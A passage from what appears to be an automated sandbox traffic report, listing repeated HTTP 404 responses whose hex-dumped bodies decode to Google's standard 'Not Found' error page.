64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:44 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:49 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 